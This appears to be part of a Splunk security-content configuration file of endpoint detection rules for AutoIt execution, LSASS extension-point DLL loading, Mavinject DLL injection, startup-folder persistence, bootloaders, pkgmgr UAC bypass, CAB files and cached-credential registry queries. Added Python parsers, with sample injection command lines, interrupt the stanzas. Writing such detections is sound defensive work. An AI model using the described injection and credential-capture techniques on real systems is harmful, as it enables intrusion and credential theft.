search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("autoit3.exe", "autoit*.exe") OR Processes.original_file_name IN ("autoit3.exe", "autoit*.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_autoit3_execution_filter`

[ESCU - Windows Autostart Execution LSASS Driver Registry Modification - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the abuse of two undocumented registry keys that allow for a DLL to load into lsass.exe to potentially capture credentials. Upon successful modification of \CurrentControlSet\Services\NTDS\DirectoryServiceExtPt or \CurrentControlSet\Services\NTDS\LsaDbExtPt, a DLL, either remote or local, will be set as the value and loaded into lsass.exe. Based on POC code, a text file may be written to disk with credentials.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.008"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the abuse of two undocumented registry keys that allow for a DLL to load into lsass.exe to potentially capture credentials. Upon successful modification of \CurrentControlSet\Services\NTDS\DirectoryServiceExtPt or \CurrentControlSet\Services\NTDS\LsaDbExtPt, a DLL, either remote or local, will be set as the value and loaded into lsass.exe. Based on POC code, a text file may be written to disk with credentials.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting registry events that include the name of the process responsible for the changes from your endpoints into the `Endpoint` data model in the `Registry` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product.
action.escu.known_false_positives = False positives may be present on recent Windows Operating Systems. Filtering may be required based on process_name. In addition, look for non-standard, unsigned module loads into LSASS. If the query is too noisy, modify it by adding Endpoint.Processes process_name to the query to identify the process making the modification.
action.escu.creation_date = 2022-08-22
action.escu.modification_date = 2022-08-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Autostart Execution LSASS Driver Registry Modification - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = The registry values for DirectoryServiceExtPt or LsaDbExtPt were modified on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Autostart Execution LSASS Driver Registry Modification - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.008"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the abuse of two undocumented registry keys that allow for a DLL to load into lsass.exe to potentially capture credentials. Upon successful modification of \CurrentControlSet\Services\NTDS\DirectoryServiceExtPt or \CurrentControlSet\Services\NTDS\LsaDbExtPt, a DLL, either remote or local, will be set as the value and loaded into lsass.exe. Based on POC code, a text file may be written to disk with credentials.
action.notable.param.rule_title = Windows Autostart Execution LSASS Driver Registry Modification
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","*\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") by Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_data Registry.action Registry.dest Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_autostart_execution_lsass_driver_registry_modification_filter`

[ESCU - Windows Binary Proxy Execution Mavinject DLL Injection - Rule]
action.escu = 0
action.escu.enabled = 1
description = Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL). In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address. During triage, review file modifications and parallel processes.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.013", "T1218"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL). In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address. During triage, review file modifications and parallel processes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present; filter on DLL name or parent process.
action.escu.creation_date = 2022-07-07 action.escu.modification_date = 2022-07-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Binary Proxy Execution Mavinject DLL Injection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a DLL. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Binary Proxy Execution Mavinject DLL Injection - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.013", "T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).
In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address. During triage, review file modifications and parallel processes. action.notable.param.rule_title = Windows Binary Proxy Execution Mavinject DLL Injection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mavinject.exe Processes.process IN ("*injectrunning*", "*hmodule=0x*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_binary_proxy_execution_mavinject_dll_injection_filter` [ESCU - Windows Boot or Logon Autostart Execution In Startup Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies suspicious files dropped or created in the Windows %startup% folder. This technique is a common way to gain persistence on a targeted host. Threat actors, adversaries and red teamers abuse this folder so that their malicious sample runs automatically when the user logs on after a boot or restart of the infected host. A hit on this TTP is a good indicator that a suspicious process is trying to gain persistence on the targeted host.
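The Mavinject search above selects on two substrings, `injectrunning` and `hmodule=0x`; at triage time what you actually want out of the command line is the target PID, the DLL path and (for the /HMODULE form) the base address and ordinal. The following is an added Python example, not code from the Splunk security_content project: it reproduces the search's substring filter and, next to it, a parser for the two command-line forms the description gives. The sample command lines are constructed, and the exact token layout mavinject.exe accepts beyond the two documented forms is an assumption.

```python
"""Added example (not part of splunk/security_content): parses mavinject.exe
command lines into the two abuse forms the description lists, DLL injection
(PID /INJECTRUNNING PATH_DLL) and import-descriptor injection
(PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER), next to the search's
own substring filter."""
import re
import shlex
from typing import Optional

INJECT_RE = re.compile(r"^/INJECTRUNNING$", re.IGNORECASE)
# The search's "*hmodule=0x*" wildcard only covers a hex base address, so
# the parser is deliberately kept to the same form.
HMODULE_RE = re.compile(r"^/HMODULE=(0x[0-9a-f]+)$", re.IGNORECASE)


def search_filter_matches(process: str) -> bool:
    """The tstats where-clause: process name is mavinject.exe and the command
    line contains 'injectrunning' or 'hmodule=0x' (assumed case-insensitive)."""
    p = process.lower()
    return "mavinject.exe" in p and ("injectrunning" in p or "hmodule=0x" in p)


def parse_mavinject(process: str) -> Optional[dict]:
    """Return a dict describing the injection, or None when the command line
    is not one of the two documented forms (e.g. a switch without a PID)."""
    try:
        # posix=False keeps Windows backslashes literal and keeps quotes on
        # quoted tokens, which we strip ourselves.
        argv = shlex.split(process, posix=False)
    except ValueError:
        return None
    if len(argv) < 4 or not argv[0].strip('"').lower().endswith("mavinject.exe"):
        return None
    pid, switch, dll = argv[1], argv[2], argv[3].strip('"')
    if not pid.isdigit():
        return None
    if INJECT_RE.match(switch):
        return {"technique": "dll_injection", "pid": int(pid), "dll": dll}
    m = HMODULE_RE.match(switch)
    if m and len(argv) >= 5 and argv[4].isdigit():
        return {"technique": "import_descriptor_injection", "pid": int(pid),
                "base_address": int(m.group(1), 16), "dll": dll,
                "ordinal": int(argv[4])}
    return None


# Constructed command lines, not from real telemetry.
SAMPLES = [
    r'C:\Windows\system32\mavinject.exe 4242 /INJECTRUNNING "C:\Users\Public\evil.dll"',
    r"mavinject.exe 4242 /HMODULE=0x7FF6A0000000 C:\Users\Public\evil.dll 1",
    r"mavinject.exe /INJECTRUNNING",          # selected by the search, unparseable
    r"C:\Windows\system32\mavinject.exe /?",  # not selected by the search
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(search_filter_matches(cmd), parse_mavinject(cmd))
```

The third sample shows why the two stages are kept separate: the substring filter is the cheap selector and fires on it, while the parser returns None, which is the signal to look at the raw command line by hand rather than trust extracted fields.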
For further investigation, we suggest verifying the process name via the process GUID field, the file that was created, and the user and computer name. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies suspicious files dropped or created in the Windows %startup% folder. This technique is a common way to gain persistence on a targeted host. Threat actors, adversaries and red teamers abuse this folder so that their malicious sample runs automatically when the user logs on after a boot or restart of the infected host. A hit on this TTP is a good indicator that a suspicious process is trying to gain persistence on the targeted host. For further investigation, we suggest verifying the process name via the process GUID field, the file that was created, and the user and computer name. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting file-system events from your endpoints that include the process responsible for the change, mapped to the `Filesystem` node of the `Endpoint` data model. action.escu.known_false_positives = Administrators may allow creation of scripts or executables in this path.
action.escu.creation_date = 2023-01-12 action.escu.modification_date = 2023-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Boot or Logon Autostart Execution In Startup Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Chaos Ransomware", "NjRAT", "RedLine Stealer"] action.risk = 1 action.risk.param._risk_message = A process dropped a file in the %startup% folder on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Boot or Logon Autostart Execution In Startup Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Chaos Ransomware", "NjRAT", "RedLine Stealer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_path = "*\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user Filesystem.file_path Filesystem.process_guid
Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_boot_or_logon_autostart_execution_in_startup_folder_filter` [ESCU - Windows BootLoader Inventory - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting query utilizes a PowerShell scripted input that captures the bootloader paths for each Windows endpoint it is deployed to. The template inputs.conf is located in the references link. By default, it only captures the path, but it may be modified to capture everything that BCDEdit provides. That output can be verbose, but may be worth it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1542.001", "T1542"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting query utilizes a PowerShell scripted input that captures the bootloader paths for each Windows endpoint it is deployed to. The template inputs.conf is located in the references link. By default, it only captures the path, but it may be modified to capture everything that BCDEdit provides. That output can be verbose, but may be worth it. action.escu.how_to_implement = To implement this analytic, a new stanza will need to be added to an inputs.conf and deployed to all or some Windows endpoints. https://gist.github.com/MHaggis/26518cd2844b0e03de6126660bb45707 provides the stanza. If modifying the sourcetype, be sure to update the macro for this analytic. We recommend running it daily or weekly, depending on your threat model.
action.escu.known_false_positives = No false positives here, only bootloaders. Filter as needed or create a lookup as a baseline. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows BootLoader Inventory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["BlackLotus Campaign", "Windows BootKits"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Windows BootLoader Inventory - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackLotus Campaign", "Windows BootKits"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1542.001", "T1542"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `bootloader_inventory` | stats count min(_time) as firstTime max(_time) as lastTime values(_raw) by host | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_bootloader_inventory_filter` [ESCU - Windows Bypass UAC via Pkgmgr Tool - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a potentially suspicious execution of the 'pkgmgr' process involving the use of an XML input file for package management. The 'pkgmgr' process, though deprecated in modern Windows systems, was historically used for managing packages. The presence of an XML input file raises concerns about the nature of the executed command and its potential impact on the system. 
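The BootLoader Inventory rule above collects what `bcdedit /enum` prints and its false-positive note suggests building a lookup as a baseline. The following is an added Python example, not code from the Splunk security_content project or from the referenced inputs.conf gist: it parses bcdedit-style output into one record per boot entry and reports every `path` that is not in a known-good set. The bcdedit output is a constructed sample laid out the way bcdedit formats it (section title, underline, aligned key/value lines, blank line between entries), and the baseline set of loader paths is an assumption you would replace with your own lookup.

```python
"""Added example (not part of splunk/security_content): parses bcdedit /enum
style output into boot entries and diffs the loader paths against a baseline,
the comparison the BootLoader Inventory hunt expects the analyst to make."""
import re

# Constructed sample of bcdedit /enum output; not captured from a real host.
SAMPLE_BCDEDIT = r"""Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=\Device\HarddiskVolume1
path                    \EFI\Microsoft\Boot\bootmgfw.efi
description             Windows Boot Manager
locale                  en-US
default                 {current}

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.efi
description             Windows 10
osdevice                partition=C:
systemroot              \Windows

Windows Boot Loader
-------------------
identifier              {a1b2c3d4-0000-4000-8000-000000000001}
device                  partition=C:
path                    \Windows\Temp\winload.efi
description             Windows 10
"""

# Assumed known-good loader paths; in Splunk this would be a lookup table.
BASELINE_PATHS = {
    r"\EFI\Microsoft\Boot\bootmgfw.efi",
    r"\Windows\system32\winload.efi",
    r"\Windows\system32\winload.exe",
}

_KV = re.compile(r"^(\S+)\s+(.*?)\s*$")


def parse_bcdedit(text: str) -> list:
    """Entries are separated by blank lines; the first line of each is the
    section title, the dashed line is skipped, the rest are key/value pairs."""
    entries, current = [], None
    for line in text.splitlines():
        if not line.strip():
            current = None          # blank line closes the entry
            continue
        if set(line.strip()) == {"-"}:
            continue                # underline beneath the title
        if current is None:
            current = {"type": line.strip()}
            entries.append(current)
            continue
        m = _KV.match(line)
        if m:
            current[m.group(1)] = m.group(2)
    return entries


def unexpected_loaders(entries, baseline=BASELINE_PATHS) -> list:
    """(identifier, path) for every entry whose loader path is not baselined;
    comparison is case-insensitive because NTFS paths are."""
    known = {b.lower() for b in baseline}
    return [(e.get("identifier"), e["path"]) for e in entries
            if "path" in e and e["path"].lower() not in known]


if __name__ == "__main__":
    for ident, path in unexpected_loaders(parse_bcdedit(SAMPLE_BCDEDIT)):
        print(f"non-baseline bootloader {ident}: {path}")
```

In Splunk terms the same comparison is a `lookup` against the `values(_raw)` the hunt collects per host; doing it once offline on the raw text, as here, is a quick way to confirm the parser and the baseline before wiring the lookup in.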
Due to the deprecated status of 'pkgmgr' and the involvement of an XML file, this activity warrants careful investigation. XML files are commonly used for configuration and data exchange, making it crucial to ascertain the intentions and legitimacy of the command. To ensure system security, it is recommended to use up-to-date package management utilities, such as DISM or PowerShell's PackageManagement module, and exercise caution when executing commands involving potentially sensitive operations or files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a potentially suspicious execution of the 'pkgmgr' process involving the use of an XML input file for package management. The 'pkgmgr' process, though deprecated in modern Windows systems, was historically used for managing packages. The presence of an XML input file raises concerns about the nature of the executed command and its potential impact on the system. Due to the deprecated status of 'pkgmgr' and the involvement of an XML file, this activity warrants careful investigation. XML files are commonly used for configuration and data exchange, making it crucial to ascertain the intentions and legitimacy of the command. To ensure system security, it is recommended to use up-to-date package management utilities, such as DISM or PowerShell's PackageManagement module, and exercise caution when executing commands involving potentially sensitive operations or files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. 
Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present on recent Windows operating systems. Filtering may be required based on process_name or parent_process_path. action.escu.creation_date = 2023-07-26 action.escu.modification_date = 2023-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Bypass UAC via Pkgmgr Tool - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Warzone RAT"] action.risk = 1 action.risk.param._risk_message = pkgmgr.exe executed with a package manager XML input file on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Bypass UAC via Pkgmgr Tool - Rule action.correlationsearch.annotations = {"analytic_story": ["Warzone RAT"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": 
["T1548.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = pkgmgr.exe Processes.process = "*.xml*" NOT(Processes.parent_process_path IN("*:\\windows\\system32\\*", "*:\\windows\\syswow64\\*", "*:\\Program Files*")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process_path Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_bypass_uac_via_pkgmgr_tool_filter` [ESCU - Windows CAB File on Disk - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies .cab files being written to disk. Utilize this analytic as a way to hunt for suspect .cab files being written to non-standard paths and tune as needed. CAB files have recently been used to deliver embedded .url files, which in turn delivered malicious payloads. The search specifically looks for instances where the file name is '*.cab' and the action is 'write'. During the triage process, it is recommended to review the file path for additional artifacts that may provide further insights into the event. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies .cab files being written to disk. Utilize this analytic as a way to hunt for suspect .cab files being written to non-standard paths and tune as needed.
CAB files have recently been used to deliver embedded .url files, which in turn delivered malicious payloads. The search specifically looks for instances where the file name is '*.cab' and the action is 'write'. During the triage process, it is recommended to review the file path for additional artifacts that may provide further insights into the event. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest file-system events that contain the file name, file path, action and the ID of the writing process. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Filesystem` node of the `Endpoint` data model, which is the node this search queries. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will only be present if a process legitimately writes a .cab file to disk. Modify the analytic as needed by file path. Filter as needed. action.escu.creation_date = 2023-11-08 action.escu.modification_date = 2023-11-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows CAB File on Disk - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = A .cab file was written to disk on endpoint $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows CAB File on Disk - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 10, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name=*.cab) by Filesystem.dest Filesystem.action Filesystem.process_id Filesystem.file_name | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_cab_file_on_disk_filter` [ESCU - Windows Cached Domain Credentials Reg Query - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process command line that queries the cached domain credential logon count (CachedLogonsCount) in the registry. This technique is used by several post-exploitation tools, such as WinPEAS, which query the CachedLogonsCount value under the Winlogon registry key. The value reveals the logon caching setting of the target Windows host: 0 means logon caching is disabled, and the maximum is 50, so any larger value still caches only 50 logons. Windows caches domain logons by default (the default CachedLogonsCount on client editions is 10).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.005", "T1003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process command line that queries the cached domain credential logon count (CachedLogonsCount) in the registry. This technique is used by several post-exploitation tools, such as WinPEAS, which query the CachedLogonsCount value under the Winlogon registry key. The value reveals the logon caching setting of the target Windows host: 0 means logon caching is disabled, and the maximum is 50, so any larger value still caches only 50 logons. Windows caches domain logons by default (the default CachedLogonsCount on client editions is 10). action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Cached Domain Credentials Reg Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = A process with command line $process$ queried the cached domain credential logon count on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Cached Domain Credentials Reg Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.005", "T1003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process = "* query *" AND Processes.process = "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" AND Processes.process = "*CACHEDLOGONSCOUNT*" by Processes.process_name Processes.original_file_name
